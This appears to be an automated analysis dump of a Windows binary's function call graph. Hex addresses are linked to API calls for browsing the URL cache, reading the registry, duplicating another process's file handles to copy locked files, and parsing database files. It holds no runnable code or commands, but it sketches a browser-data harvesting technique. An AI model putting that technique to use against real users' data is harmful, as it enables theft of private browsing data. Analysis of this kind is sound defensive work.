35978->35982 35983 40f44a 35978->35983 36428 4076a9 wcslen wcscat wcscpy wcscat 35979->36428 36429 4076a9 wcslen wcscat wcscpy wcscat 35982->36429 35985 40ef37 22 API calls 35983->35985 35986 40f466 35985->35986 35987 40ef37 22 API calls 35986->35987 35988 40f477 35987->35988 36410 40f4f7 memset wcslen wcslen 35988->36410 35990 40f48c 35991 40f4e8 35990->35991 35993 40f497 memset 35990->35993 35995 407447 2 API calls 35990->35995 35996 407f88 9 API calls 35990->35996 36430 407eb8 free free 35991->36430 35993->35990 35994 40f4f0 35994->35853 35995->35990 35996->35990 35998 412270 10 API calls 35997->35998 35999 40f15f 35998->35999 36000 412270 10 API calls 35999->36000 36001 40f16d wcslen wcslen 36000->36001 36002 40f194 36001->36002 36003 40f1ab wcslen wcslen 36001->36003 36446 4076a9 wcslen wcscat wcscpy wcscat 36002->36446 36006 40f1f2 wcslen wcslen 36003->36006 36007 40f1db 36003->36007 36010 40f222 36006->36010 36011 40f239 36006->36011 36447 4076a9 wcslen wcscat wcscpy wcscat 36007->36447 36448 4076a9 wcslen wcscat wcscpy wcscat 36010->36448 36013 40ef37 22 API calls 36011->36013 36014 40f255 36013->36014 36015 40ef37 22 API calls 36014->36015 36016 40f266 36015->36016 36017 40f4f7 35 API calls 36016->36017 36018 40f27b 36017->36018 36019 40f2d7 36018->36019 36021 40f286 memset 36018->36021 36023 407447 2 API calls 36018->36023 36024 407f88 9 API calls 36018->36024 36445 407eb8 free free 36019->36445 36021->36018 36022 40f2df memset 36025 411bbc 36022->36025 36023->36018 36024->36018 36449 411b67 RegOpenKeyExW 36025->36449 36027 411bd2 36028 4102fb 36027->36028 36450 411b81 RegQueryValueExW 36027->36450 36028->35828 36078 407548 GetFileAttributesW 36028->36078 36030 411be9 RegCloseKey 36030->36028 36033 40640c 36032->36033 36034 40641b 36032->36034 36451 4076a9 wcslen wcscat wcscpy wcscat 36033->36451 36452 407548 GetFileAttributesW 36034->36452 36037 406433 36038 40647f 36037->36038 36039 40643c memset 36037->36039 36038->35859 36453 407e0e FindFirstFileW FindNextFileW FindClose 36039->36453 36041 40646c 36041->36038 36043 4121c3 2 API calls 36042->36043 36044 412282 36043->36044 36045 4122b5 memset 36044->36045 36454 407674 36044->36454 36049 4122d6 36045->36049 36048 4122a6 SHGetSpecialFolderPathW 36052 410432 wcslen wcslen 36048->36052 36457 411b67 RegOpenKeyExW 36049->36457 36050 412303 36053 412336 wcscpy 36050->36053 36458 4121f2 wcscpy 36050->36458 36052->35817 36052->35818 36053->36052 36055 412314 36459 411b81 RegQueryValueExW 36055->36459 36057 41232b RegCloseKey 36057->36053 36059 4083e1 9 API calls 36058->36059 36062 410036 36059->36062 36060 408441 9 API calls 36060->36062 36061 410065 36064 4084da FindClose 36061->36064 36062->36060 36062->36061 36063 40839d 2 API calls 36062->36063 36066 410075 178 API calls 36062->36066 36063->36062 36065 410070 wcslen wcslen 36064->36065 36065->35841 36065->35842 36066->36062 36068 412270 10 API calls 36067->36068 36069 401b3a wcslen wcslen 36068->36069 36070 401b61 36069->36070 36071 401b70 36069->36071 36460 4076a9 wcslen wcscat wcscpy wcscat 36070->36460 36461 407548 GetFileAttributesW 36071->36461 36074 401b7e 36074->35819 36075->35796 36076->35853 36077->35796 36078->35840 36079->35859 36080->35854 36082 407458 36081->36082 36083 40745b memcpy 36081->36083 36082->36083 36083->35815 36085 4100c3 36084->36085 36087 4100d2 36084->36087 36502 4076a9 wcslen wcscat wcscpy wcscat 36085->36502 36462 407548 GetFileAttributesW 36087->36462 36089 4100e9 36090 410102 wcslen wcslen 36089->36090 36463 402846 36089->36463 36092 410121 36090->36092 36093 410130 36090->36093 36503 4076a9 wcslen wcscat wcscpy wcscat 36092->36503 36501 407548 GetFileAttributesW 36093->36501 36096 410148 36097 410161 36096->36097 36098 402846 168 API calls 36096->36098 36097->35833 36098->36097 36099->35817 36100->35841 36101->35831 36102->35846 36103->35855 36104->35862 36105->35834 36106->35864 36108 4084da FindClose 36107->36108 36109 4083ee 36108->36109 36110 407447 2 API calls 36109->36110 36111 408401 wcslen wcslen 36110->36111 36112 408432 36111->36112 36113 40842b 36111->36113 36112->35873 36882 4076a9 wcslen wcscat wcscpy wcscat 36113->36882 36116 4083a9 36115->36116 36119 4083d8 36115->36119 36117 4083b0 wcscmp 36116->36117 36116->36119 36118 4083c7 wcscmp 36117->36118 36117->36119 36118->36119 36119->35873 36120->35873 36121->35873 36122->35873 36124 40844c FindFirstFileW 36123->36124 36125 40846d FindNextFileW 36123->36125 36126 408488 36124->36126 36127 408483 36125->36127 36128 40848f wcslen wcslen 36125->36128 36126->36128 36130 4084c8 36126->36130 36129 4084da FindClose 36127->36129 36128->36130 36131 4084bf 36128->36131 36129->36126 36130->35873 36883 4076a9 wcslen wcscat wcscpy wcscat 36131->36883 36134 4084e3 FindClose 36133->36134 36135 4084ed 36133->36135 36134->36135 36135->35802 36136->35884 36137->35886 36138->35888 36140 412270 10 API calls 36139->36140 36141 409542 36140->36141 36208 40946c 36141->36208 36146 409652 36163 407f88 36146->36163 36148 409591 FindFirstUrlCacheEntryW 36149 4095b2 wcschr 36148->36149 36150 40964a 36148->36150 36152 4095f2 FindNextUrlCacheEntryW 36149->36152 36153 4095c5 36149->36153 36239 408604 36150->36239 36152->36149 36154 409607 GetLastError 36152->36154 36155 407f88 9 API calls 36153->36155 36156 409641 FindCloseUrlCache 36154->36156 36157 409612 36154->36157 36158 4095d2 wcschr 36155->36158 36156->36150 36159 4085eb 2 API calls 36157->36159 36158->36152 36160 4095e3 36158->36160 36161 409625 FindNextUrlCacheEntryW 36159->36161 36162 407f88 9 API calls 36160->36162 36161->36149 36161->36156 36162->36152 36335 407fad 36163->36335 36165 407fa9 36165->35895 36167 407ede 7 API calls 36167->36165 36340 407eb8 free free 36168->36340 36170 409670 36341 411b67 RegOpenKeyExW 36170->36341 36172 409681 36173 40968c 36172->36173 36174 40979d 36172->36174 36175 408001 4 API calls 36173->36175 36188 4038c4 36174->36188 36176 4096a6 memset 36175->36176 36342 408050 36176->36342 36179 409793 RegCloseKey 36179->36174 36180 4096ff 36181 409708 _wcsupr 36180->36181 36182 407ede 7 API calls 36181->36182 36183 409726 36182->36183 36184 407ede 7 API calls 36183->36184 36185 40973a memset 36184->36185 36186 408050 36185->36186 36187 409772 RegEnumValueW 36186->36187 36187->36179 36187->36181 36189 403925 36188->36189 36190 4038c9 7 API calls 36188->36190 36189->35909 36190->36189 36192 407447 2 API calls 36191->36192 36193 407dee _wcslwr 36192->36193 36194 4098c2 36193->36194 36195 4038c4 7 API calls 36194->36195 36196 4098d8 36195->36196 36197 4098fd wcslen 36196->36197 36204 4099df wcslen 36196->36204 36198 4038c4 7 API calls 36197->36198 36199 409916 36198->36199 36200 4099d5 36199->36200 36201 4038c4 7 API calls 36199->36201 36202 4038c4 7 API calls 36200->36202 36203 40994f 36201->36203 36202->36204 36203->36200 36205 40996c memset 36203->36205 36204->35909 36206 409993 36205->36206 36344 409817 9 API calls 36206->36344 36209 4083e1 9 API calls 36208->36209 36218 4094a4 36209->36218 36210 408441 9 API calls 36210->36218 36211 4094f8 36212 4084da FindClose 36211->36212 36214 409503 36212->36214 36213 40839d 2 API calls 36213->36218 36220 4090df memset memset 36214->36220 36215 4094c5 _wcsicmp 36217 4094dc 36215->36217 36215->36218 36216 40946c 37 API calls 36216->36218 36242 40931d 22 API calls 36217->36242 36218->36210 36218->36211 36218->36213 36218->36215 36218->36216 36221 412270 10 API calls 36220->36221 36222 409130 wcslen wcslen 36221->36222 36223 409158 36222->36223 36224 40916b 36222->36224 36266 4076a9 wcslen wcscat wcscpy wcscat 36223->36266 36243 407548 GetFileAttributesW 36224->36243 36227 409182 36228 409187 wcslen wcslen 36227->36228 36229 4091c0 36227->36229 36228->36229 36230 4091a9 36228->36230 36244 407548 GetFileAttributesW 36229->36244 36267 4076a9 wcslen wcscat wcscpy wcscat 36230->36267 36233 4091d7 36234 4091eb 36233->36234 36245 408fa4 36233->36245 36234->36146 36236 4085eb 36234->36236 36237 408604 ??3@YAXPAX 36236->36237 36238 4085f3 ??2@YAPAXI 36237->36238 36238->36148 36240 408618 36239->36240 36241 40860a ??3@YAXPAX 36239->36241 36240->36146 36241->36240 36242->36218 36243->36227 36244->36233 36268 408b10 36245->36268 36247 409085 36248 4090a2 36247->36248 36249 40908e DeleteFileW 36247->36249 36251 408604 ??3@YAXPAX 36248->36251 36249->36248 36250 409013 36250->36247 36291 408c67 36250->36291 36252 4090ad 36251->36252 36254 4090b6 CloseHandle 36252->36254 36255 4090be 36252->36255 36254->36255 36257 402778 free 36255->36257 36256 409065 36259 409076 36256->36259 36260 40906e FindCloseChangeNotification 36256->36260 36258 4090cd 36257->36258 36262 402778 free 36258->36262 36334 407eb8 free free 36259->36334 36260->36259 36261 409032 36261->36256 36311 408d9d 36261->36311 36264 4090d5 36262->36264 36264->36234 36266->36224 36267->36229 36269 4050b7 22 API calls 36268->36269 36270 408b2e 36269->36270 36271 408c5d 36270->36271 36272 408836 68 API calls 36270->36272 36271->36250 36273 408b5d 36272->36273 36273->36271 36274 4085eb ??2@YAPAXI ??3@YAXPAX 36273->36274 36275 408b7f OpenProcess 36274->36275 36276 408c44 36275->36276 36277 408b96 GetCurrentProcess DuplicateHandle 36275->36277 36278 408c52 36276->36278 36282 4050b7 22 API calls 36276->36282 36279 408bc2 GetFileSize 36277->36279 36280 408c3c CloseHandle 36277->36280 36283 408604 ??3@YAXPAX 36278->36283 36281 4074c6 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 36279->36281 36280->36276 36284 408bdc 36281->36284 36282->36278 36283->36271 36285 40715d CreateFileW 36284->36285 36286 408be3 CreateFileMappingW 36285->36286 36287 408c32 CloseHandle CloseHandle 36286->36287 36288 408bfd MapViewOfFile 36286->36288 36287->36280 36289 408c11 WriteFile UnmapViewOfFile 36288->36289 36290 408c2d FindCloseChangeNotification 36288->36290 36289->36290 36290->36287 36292 408c7e 36291->36292 36293 4059f7 11 API calls 36292->36293 36294 408c91 36293->36294 36295 408c99 memset 36294->36295 36296 408d8b 36294->36296 36307 408cda 36295->36307 36297 40580a free ??3@YAXPAX 36296->36297 36298 408d96 36297->36298 36298->36261 36299 405cf6 13 API calls 36299->36307 36300 408801 _wcsicmp 36300->36307 36301 4059ba SetFilePointerEx ReadFile 36301->36307 36302 408d75 36303 408d83 36302->36303 36304 408d7a free 36302->36304 36305 408037 free 36303->36305 36304->36303 36305->36296 36306 406295 8 API calls 36306->36307 36307->36299 36307->36300 36307->36301 36307->36302 36307->36306 36308 408116 wcslen wcslen _memicmp 36307->36308 36309 408d36 _snwprintf 36307->36309 36308->36307 36310 407ede 7 API calls 36309->36310 36310->36307 36312 408db4 36311->36312 36313 4059f7 11 API calls 36312->36313 36323 408dc5 36313->36323 36314 408f92 36315 40580a free ??3@YAXPAX 36314->36315 36317 408f9d 36315->36317 36316 405cf6 13 API calls 36316->36323 36317->36261 36318 4059ba SetFilePointerEx ReadFile 36318->36323 36319 408f7b 36320 408037 free 36319->36320 36321 408f83 36320->36321 36321->36314 36322 408f89 free 36321->36322 36322->36314 36323->36314 36323->36316 36323->36318 36323->36319 36324 408801 _wcsicmp 36323->36324 36325 408801 _wcsicmp 36323->36325 36328 406295 8 API calls 36323->36328 36329 408ed2 memcpy 36323->36329 36330 408eed memcpy 36323->36330 36331 408ea5 wcschr 36323->36331 36332 408f08 memcpy 36323->36332 36333 408f23 memcpy 36323->36333 36324->36323 36326 408e68 memset 36325->36326 36327 40805c 6 API calls 36326->36327 36327->36323 36328->36323 36329->36323 36330->36323 36331->36323 36332->36323 36333->36323 36334->36247 36336 407fb3 36335->36336 36337 407fc8 _wcsicmp 36336->36337 36338 407fcf wcscmp 36336->36338 36339 407f98 36336->36339 36337->36336 36338->36336 36339->36165 36339->36167 36340->36170 36341->36172 36343 408056 RegEnumValueW 36342->36343 36343->36179 36343->36180 36344->36200 36346 40383e FreeLibrary 36345->36346 36347 4037cb LoadLibraryW 36346->36347 36348 403839 36347->36348 36349 4037dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 36347->36349 36348->35914 36348->35916 36348->35920 36350 403825 36349->36350 36351 40382b 36350->36351 36352 40383e FreeLibrary 36350->36352 36351->36348 36352->36348 36354 403844 FreeLibrary 36353->36354 36355 40384e 36353->36355 36354->36355 36355->35930 36356->35924 36358 409ec4 LoadLibraryW 36357->36358 36359 4117ee FreeLibrary 36357->36359 36358->35933 36358->35934 36359->36358 36360->35940 36362 4422cd 8 API calls 36361->36362 36363 44233b 36361->36363 36362->36363 36363->35945 36363->35947 36364->35955 36366 40ee0e 36365->36366 36380 40f026 memset memset 36366->36380 36368 40ee14 36369 40ef28 36368->36369 36371 40ee2c memset 36368->36371 36373 40ee55 wcslen wcslen 36368->36373 36374 4076a9 wcslen wcscat wcscpy wcscat 36368->36374 36375 40eeb8 wcslen wcslen 36368->36375 36376 407548 GetFileAttributesW 36368->36376 36377 407ede 7 API calls 36368->36377 36393 407eb8 free free 36369->36393 36371->36368 36372 40ed87 36372->35960 36372->35961 36373->36368 36374->36368 36375->36368 36376->36368 36377->36368 36378->35963 36379->35965 36381 412270 10 API calls 36380->36381 36382 40f071 36381->36382 36394 40719a wcslen 36382->36394 36385 412270 10 API calls 36386 40f09a 36385->36386 36387 40719a 2 API calls 36386->36387 36388 40f0a1 wcscat 36387->36388 36398 40ef37 36388->36398 36391 40ef37 22 API calls 36392 40f0ce 36391->36392 36392->36368 36393->36372 36395 4071a5 36394->36395 36396 4071ba wcscat 36394->36396 36395->36396 36397 4071ad wcscat 36395->36397 36396->36385 36397->36396 36399 40ef44 36398->36399 36400 4083e1 9 API calls 36399->36400 36408 40ef72 36400->36408 36401 40f015 36403 4084da FindClose 36401->36403 36402 40839d wcscmp wcscmp 36402->36408 36404 40f020 36403->36404 36404->36391 36405 4083e1 9 API calls 36405->36408 36406 408441 9 API calls 36406->36408 36407 4084da FindClose 36407->36408 36408->36401 36408->36402 36408->36405 36408->36406 36408->36407 36409 407ede 7 API calls 36408->36409 36409->36408 36411 40f543 36410->36411 36412 40f556 36410->36412 36435 4076a9 wcslen wcscat wcscpy wcscat 36411->36435 36431 407548 GetFileAttributesW 36412->36431 36415 40f56d 36416 40f760 36415->36416 36417 40f576 6 API calls 36415->36417 36416->35990 36418 40f61e 36417->36418 36418->36416 36420 40f62d memset 36418->36420 36432 411e84 36418->36432 36421 40f694 wcscpy 36420->36421 36422 40f64a wcslen wcslen 36420->36422 36424 40f66a 36421->36424 36422->36424 36425 407f88 9 API calls 36424->36425 36436 4076a9 wcslen wcscat wcscpy wcscat 36424->36436 36426 40f6ba memset memset _snwprintf wcscpy 36425->36426 36426->36418 36427->35974 36428->35978 36429->35983 36430->35994 36431->36415 36437 411a13 36432->36437 36434 411ea8 36434->36418 36435->36412 36436->36424 36438 411a20 36437->36438 36439 411a26 36438->36439 36440 411a78 GetPrivateProfileStringW 36438->36440 36441 411a66 36439->36441 36442 411a2a wcschr 36439->36442 36440->36434 36444 411a6a WritePrivateProfileStringW 36441->36444 36442->36441 36443 411a38 _snwprintf 36442->36443 36443->36444 36444->36434 36445->36022 36446->36003 36447->36006 36448->36011 36449->36027 36450->36030 36451->36034 36452->36037 36453->36041 36455 407683 GetVersionExW 36454->36455 36456 407694 36454->36456 36455->36456 36456->36045 36456->36048 36457->36050 36458->36055 36459->36057 36460->36071 36461->36074 36462->36089 36464 442a90 36463->36464 36465 402853 memset CreateFileW 36464->36465 36466 4028ad FindCloseChangeNotification 36465->36466 36467 40288d 36465->36467 36469 4028b4 memset 36466->36469 36583 4074c6 GetTempPathW 36467->36583 36504 407dc0 WideCharToMultiByte 36469->36504 36470 40289d CopyFileW 36470->36469 36472 4028dc 36505 441683 36472->36505 36475 402b08 36477 402b20 36475->36477 36478 402b13 DeleteFileW 36475->36478 36477->36090 36478->36477 36479 402915 36480 402b00 36479->36480 36586 4229ef 36479->36586 36563 440fee 36480->36563 36483 402929 36484 402afb 36483->36484 36485 40292e memset 36483->36485 36610 422751 124 API calls 36484->36610 36604 422bd7 17 API calls 36485->36604 36488 40294d 36488->36483 36489 422bd7 17 API calls 36488->36489 36490 422b66 16 API calls 36488->36490 36492 407df5 MultiByteToWideChar 36488->36492 36495 422bb7 16 API calls 36488->36495 36497 402a84 memset memcpy 36488->36497 36499 4229ef 138 API calls 36488->36499 36605 4027d7 SystemTimeToFileTime FileTimeToLocalFileTime 36488->36605 36606 4227e8 13 API calls 36488->36606 36607 420a55 13 API calls 36488->36607 36608 403853 LoadLibraryW GetProcAddress FreeLibrary 36488->36608 36489->36488 36490->36488 36492->36488 36495->36488 36609 407df5 MultiByteToWideChar 36497->36609 36499->36488 36500 402acc LocalFree 36500->36488 36501->36096 36502->36087 36503->36093 36504->36472 36611 440b13 36505->36611 36507 44169d 36508 4028ef 36507->36508 36625 4132c6 36507->36625 36508->36475 36551 435ad8 36508->36551 36510 441537 11 API calls 36511 4418f1 36510->36511 36511->36508 36515 440fee 112 API calls 36511->36515 36512 4416d7 36513 44170a memcpy 36512->36513 36521 4416f5 36512->36521 36629 412a92 36513->36629 36515->36508 36516 441776 36517 441794 36516->36517 36518 44177d 36516->36518 36634 441567 36517->36634 36519 414164 16 API calls 36518->36519 36519->36521 36521->36510 36523 441567 18 API calls 36524 4417b6 36523->36524 36525 441567 18 API calls 36524->36525 36526 4417c2 36525->36526 36527 441567 18 API calls 36526->36527 36528 4417d2 36527->36528 36528->36521 36648 430490 36528->36648 36531 441567 18 API calls 36532 441803 36531->36532 36652 41c702 36532->36652 36534 441822 36535 441841 36534->36535 36536 441829 36534->36536 36668 43076e 36535->36668 36538 414164 16 API calls 36536->36538 36538->36521 36540 43076e memset 36541 44185c 36540->36541 36541->36521 36674 414164 36541->36674 36543 441899 36682 432406 36543->36682 36545 4418a0 36690 434cd2 36545->36690 36549 4418b0 36549->36521 36550 414164 16 API calls 36549->36550 36550->36521 36745 41486e 36551->36745 36553 435ae7 36554 435af7 36553->36554 36555 435aeb 36553->36555 36752 4358e0 36554->36752 36782 44193d 11 API calls 36555->36782 36559 435af5 36559->36479 36561 435b26 36562 4358e0 135 API calls 36561->36562 36562->36559 36564 441001 36563->36564 36574 441014 36563->36574 36821 4148a9 11 API calls 36564->36821 36566 441006 36567 44101a 36566->36567 36568 44100a 36566->36568 36823 42d857 memset memset memcpy 36567->36823 36822 44193d 11 API calls 36568->36822 36571 44103e 36572 414164 16 API calls 36571->36572 36572->36574 36573 44102c 36573->36571 36578 441080 36573->36578 36574->36475 36575 4410b8 36825 42d857 memset memset memcpy 36575->36825 36578->36575 36824 41c8dc 104 API calls 36578->36824 36579 4410c1 36580 414164 16 API calls 36579->36580 36581 441199 36580->36581 36581->36574 36826 420a3f memset memcpy 36581->36826 36584 4074f5 GetTempFileNameW 36583->36584 36585 4074e7 GetWindowsDirectoryW 36583->36585 36584->36470 36585->36584 36827 422732 36586->36827 36588 422a0f 36589 422a22 36588->36589 36590 422a13 36588->36590 36835 422923 36589->36835 36834 44193d 11 API calls 36590->36834 36593 422ab1 36594 4134b7 16 API calls 36593->36594 36596 422a1d 36594->36596 36596->36483 36597 422a73 36597->36593 36845 42281b 13 API calls 36597->36845 36600 422a34 36600->36593 36600->36597 36601 422923 128 API calls 36600->36601 36843 435b4f 136 API calls 36600->36843 36844 42279f 125 API calls 36600->36844 36601->36600 36602 422a90 36602->36593 36846 413423 memcpy 36602->36846 36604->36488 36605->36488 36606->36488 36607->36488 36608->36488 36609->36500 36610->36480 36612 440b2e 36611->36612 36621 440b27 36611->36621 36701 412bdf memcpy memcpy 36612->36701 36614 440b33 36615 412d4a 10 API calls 36614->36615 36616 440b64 36614->36616 36614->36621 36615->36616 36617 440bce memset 36616->36617 36616->36621 36620 440be9 36617->36620 36618 440bfe 36619 412f68 10 API calls 36618->36619 36618->36621 36623 440c1e 36619->36623 36620->36618 36622 416f8b 10 API calls 36620->36622 36621->36507 36622->36618 36623->36621 36624 4161b0 10 API calls 36623->36624 36624->36621 36626 4132d0 36625->36626 36627 4132d7 memset 36626->36627 36628 4132e6 36626->36628 36627->36628 36628->36512 36630 440b13 11 API calls 36629->36630 36632 412a9f 36630->36632 36631 412aa3 36631->36516 36632->36631 36633 412ac9 strcmp 36632->36633 36633->36631 36633->36632 36635 441579 36634->36635 36636 441674 36635->36636 36637 44159f 36635->36637 36702 44193d 11 API calls 36636->36702 36639 430490 3 API calls 36637->36639 36640 4415ab 36639->36640 36642 4415c6 36640->36642 36647 4415dc 36640->36647 36641 430490 3 API calls 36643 44163d 36641->36643 36644 414164 16 API calls 36642->36644 36645 414164 16 API calls 36643->36645 36646 4415d2 36643->36646 36644->36646 36645->36646 36646->36523 36647->36641 36649 4304a7 36648->36649 36650 43049a 36648->36650 36649->36531 36703 430406 memset memset memcpy 36650->36703 36653 41c712 36652->36653 36654 4132c6 memset 36653->36654 36655 41c753 36654->36655 36656 4132c6 memset 36655->36656 36663 41c75d 36655->36663 36657 41c772 36656->36657 36660 41c779 36657->36660 36704 419008 36657->36704 36659 41c796 36659->36660 36661 41c7a4 memset 36659->36661 36660->36663 36719 418b50 102 API calls 36660->36719 36664 41c7c1 36661->36664 36666 41c7ce 36661->36666 36663->36534 36665 4129d7 6 API calls 36664->36665 36665->36666 36666->36660 36718 4189f9 memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 36666->36718 36669 430775 36668->36669 36670 430784 36668->36670 36720 41f750 memset 36669->36720 36721 4132ea 36670->36721 36673 430781 36673->36540 36676 41416d 36674->36676 36678 4141bd 36674->36678 36675 41417b 36675->36678 36726 413dce 36675->36726 36676->36675 36725 420801 memset 36676->36725 36678->36543 36683 432417 36682->36683 36732 43059c 36683->36732 36685 432431 36686 432448 36685->36686 36742 4412bc 17 API calls 36685->36742 36738 4134b7 36686->36738 36689 432452 36689->36545 36691 434d5a 36690->36691 36692 434ce7 36690->36692 36694 441537 36691->36694 36692->36691 36693 414164 16 API calls 36692->36693 36693->36692 36695 441554 36694->36695 36696 44153c 36694->36696 36695->36549 36743 4148a9 11 API calls 36696->36743 36698 441543 36698->36695 36744 44193d 11 API calls 36698->36744 36700 441551 36700->36549 36702->36646 36703->36649 36707 419041 36704->36707 36705 4132c6 memset 36706 4190f1 36705->36706 36708 419078 36706->36708 36709 419131 memcpy memcpy memcpy memcpy memcpy 36706->36709 36710 4191af 36706->36710 36707->36708 36716 4190b3 36707->36716 36717 441959 11 API calls 36707->36717 36708->36659 36709->36710 36711 4191dc 36710->36711 36712 412a1d 56 API calls 36710->36712 36711->36708 36713 4189f9 memset 36711->36713 36712->36711 36714 419241 36713->36714 36714->36708 36715 419261 memset 36714->36715 36715->36708 36716->36705 36716->36708 36717->36716 36718->36660 36719->36663 36720->36673 36722 4132f6 36721->36722 36723 4132fd memset 36722->36723 36724 41330c 36722->36724 36723->36724 36724->36673 36725->36675 36727 413538 11 API calls 36726->36727 36728 413e15 36727->36728 36729 413d4e 11 API calls 36728->36729 36730 413e20 36729->36730 36730->36678 36731 4203b4 15 API calls 36730->36731 36731->36678 36733 4305da 36732->36733 36734 4132ea memset 36733->36734 36736 430612 36733->36736 36735 430676 36734->36735 36735->36736 36737 43067d memcpy 36735->36737 36736->36685 36737->36736 36739 4134d6 36738->36739 36740 4134bb 36738->36740 36739->36689 36740->36739 36741 414164 16 API calls 36740->36741 36741->36739 36742->36686 36743->36698 36744->36700 36746 41488b 36745->36746 36751 414873 36745->36751 36747 4148a4 36746->36747 36785 4148a9 11 API calls 36746->36785 36747->36553 36750 414884 36750->36553 36751->36750 36784 413f8e 11 API calls 36751->36784 36753 4132ea memset 36752->36753 36754 4358fe 36753->36754 36755 435908 36754->36755 36756 4359b8 36754->36756 36758 435947 36754->36758 36757 4134b7 16 API calls 36755->36757 36786 440812 36756->36786 36760 435ad0 36757->36760 36761 43596e 36758->36761 36762 43594c 36758->36762 36760->36559 36783 422751 124 API calls 36760->36783 36817 41345d memcpy 36761->36817 36763 414164 16 API calls 36762->36763 36765 43595a 36763->36765 36767 4134b7 16 API calls 36765->36767 36766 43597b 36768 440812 19 API calls 36766->36768 36771 43598d 36766->36771 36767->36755 36768->36771 36769 4359ea 36775 4359fa 36769->36775 36818 42d857 memset memset memcpy 36769->36818 36771->36769 36812 4357fd 36771->36812 36773 435a43 36774 435a6b 36773->36774 36820 421d6b 124 API calls 36773->36820 36777 435a92 36774->36777 36778 435a7a 36774->36778 36775->36773 36819 41345d memcpy 36775->36819 36781 414164 16 API calls 36777->36781 36780 414164 16 API calls 36778->36780 36780->36755 36781->36755 36782->36559 36783->36561 36784->36750 36785->36751 36787 44083a 36786->36787 36790 4408e9 36787->36790 36791 44093d 36787->36791 36794 44027b 19 API calls 36787->36794 36796 4408df 36787->36796 36810 440885 36787->36810 36788 43e68c memset 36795 4409c1 36788->36795 36789 4409a1 36793 44027b 19 API calls 36789->36793 36790->36789 36792 44027b 19 API calls 36790->36792 36790->36795 36798 413e2d 11 API calls 36791->36798 36792->36789 36793->36795 36794->36787 36795->36788 36801 4409db 36795->36801 36799 4141d6 11 API calls 36796->36799 36797 440a22 36800 413f8e 11 API calls 36797->36800 36802 440a41 36797->36802 36798->36790 36799->36790 36800->36802 36801->36797 36806 413490 11 API calls 36801->36806 36803 421e68 memset memcpy 36802->36803 36804 440a63 36802->36804 36803->36804 36805 440a88 36804->36805 36808 42d9bc memset 36804->36808 36807 43917f memset 36805->36807 36806->36797 36809 440a98 36807->36809 36808->36805 36809->36810 36811 42d9bc memset 36809->36811 36810->36771 36811->36809 36813 4358b4 36812->36813 36815 43581d 36812->36815 36813->36769 36814 41cc62 111 API calls 36814->36815 36815->36813 36815->36814 36816 41ce68 105 API calls 36815->36816 36816->36815 36817->36766 36818->36775 36819->36773 36820->36774 36821->36566 36822->36574 36823->36573 36824->36578 36825->36579 36826->36574 36828 422737 36827->36828 36829 42274a 36827->36829 36847 413f8e 11 API calls 36828->36847 36848 422715 11 API calls 36829->36848 36832 42274f 36832->36588 36833 422743 36833->36588 36834->36596 36836 422933 36835->36836 36841 422938 36835->36841 36881 42279f 125 API calls 36836->36881 36839 422999 36842 4134b7 16 API calls 36839->36842 36840 422940 36840->36600 36841->36840 36849 422e5f 36841->36849 36842->36840 36843->36600 36844->36600 36845->36602 36846->36593 36847->36833 36848->36832 36865 422eb5 36849->36865 36877 423186 36849->36877 36850 413490 11 API calls 36856 42319e 36850->36856 36851 427285 36854 413490 11 API calls 36851->36854 36866 42329a 36851->36866 36852 413f8e 11 API calls 36855 4238a1 36852->36855 36853 420020 memset memcpy 36853->36865 36854->36856 36860 421a7e 121 API calls 36855->36860 36856->36852 36857 4203b4 15 API calls 36857->36865 36858 427211 36862 42722a 36858->36862 36863 42725f 36858->36863 36859 42031b memset memcpy memcpy 36859->36865 36860->36866 36861 421a29 11 API calls 36861->36865 36868 413490 11 API calls 36862->36868 36871 413f8e 11 API calls 36863->36871 36876 42725a 36863->36876 36864 42038d memset memcpy memcpy 36864->36865 36865->36851 36865->36853 36865->36856 36865->36857 36865->36858 36865->36859 36865->36861 36865->36864 36867 423865 36865->36867 36873 41fe70 13 API calls 36865->36873 36874 421967 91 API calls 36865->36874 36865->36877 36880 4231fc 36865->36880 36866->36839 36870 413490 11 API calls 36867->36870 36869 42723e 36868->36869 36875 413f8e 11 API calls 36869->36875 36870->36856 36871->36876 36872 421a7e 121 API calls 36872->36851 36873->36865 36874->36865 36875->36876 36876->36872 36877->36850 36877->36866 36878 41fe70 13 API calls 36878->36880 36879 41ff10 12 API calls 36879->36880 36880->36877 36880->36878 36880->36879 36881->36841 36882->36112 36883->36130 37257 43ee2e 16 API calls 37258 42ba2c 16 API calls 36898 411e35 36901 411b36 36898->36901 36900 411e55 36902 411b42 36901->36902 36903 411b54 GetPrivateProfileIntW 36901->36903 36906 4119c6 memset _itow WritePrivateProfileStringW 36902->36906 36903->36900 36905 411b4f 36905->36900 36906->36905 37260 40de35 62 API calls 37262 40da3a 134 API calls 37264 4156c3 memset UnlockFileEx LockFileEx GetLastError 37267 43eec0 15 API calls 37083 4048c7 9 API calls 37268 40c2c7 7 API calls 37084 4270d1 memcpy 37272 4246de 87 API calls 37273 42aade 165 API calls 37274 422ae3 15 API calls 37275 4016e2 DefWindowProcW ??2@YAPAXI memset memcpy ??3@YAXPAX 37276 431ee1 18 API calls 37277 4036e5 memset wcscat _wtoi _wcsicmp 37278 40b2e6 _wcsicmp 37279 42b6e5 14 API calls 37092 40dcec 17 API calls 37281 43faee 23 API calls 37094 4030f0 55 API calls 37095 4014f1 memcpy memcpy GetModuleHandleW DialogBoxParamW 37096 412cf0 InitializeCriticalSection memset 37283 4322f2 17 API calls 37284 40caf1 memset memset _wcsicmp 37097 4034f2 wcslen WriteFile 37099 422ed5 128 API calls 37100 442cf1 _onexit __dllonexit 37101 4160f7 Sleep 37026 411ef8 FindResourceW 37027 411f11 SizeofResource 37026->37027 37030 411f3b 37026->37030 37028 411f22 LoadResource 37027->37028 37027->37030 37029 411f30 LockResource 37028->37029 37028->37030 37029->37030 37103 43eb18 174 API calls 37104 431cfd 20 API calls 37105 426cfd 139 API calls 37289 422ed5 127 API calls 37106 401485 17 API calls 37291 414e8b SetFilePointer GetLastError GetLastError WriteFile GetLastError 37292 43228f 21 API calls 37107 40b88e memset _snwprintf SendMessageW 37108 426491 139 API calls 36907 43ea97 36910 42dea0 36907->36910 36909 43eaa3 36911 42debe 36910->36911 36923 42ded5 36910->36923 36912 42dec7 36911->36912 36913 42dedc 36911->36913 36924 4141d6 11 API calls 36912->36924 36925 42dab9 memcpy 36913->36925 36916 42df37 36918 42df7f memset 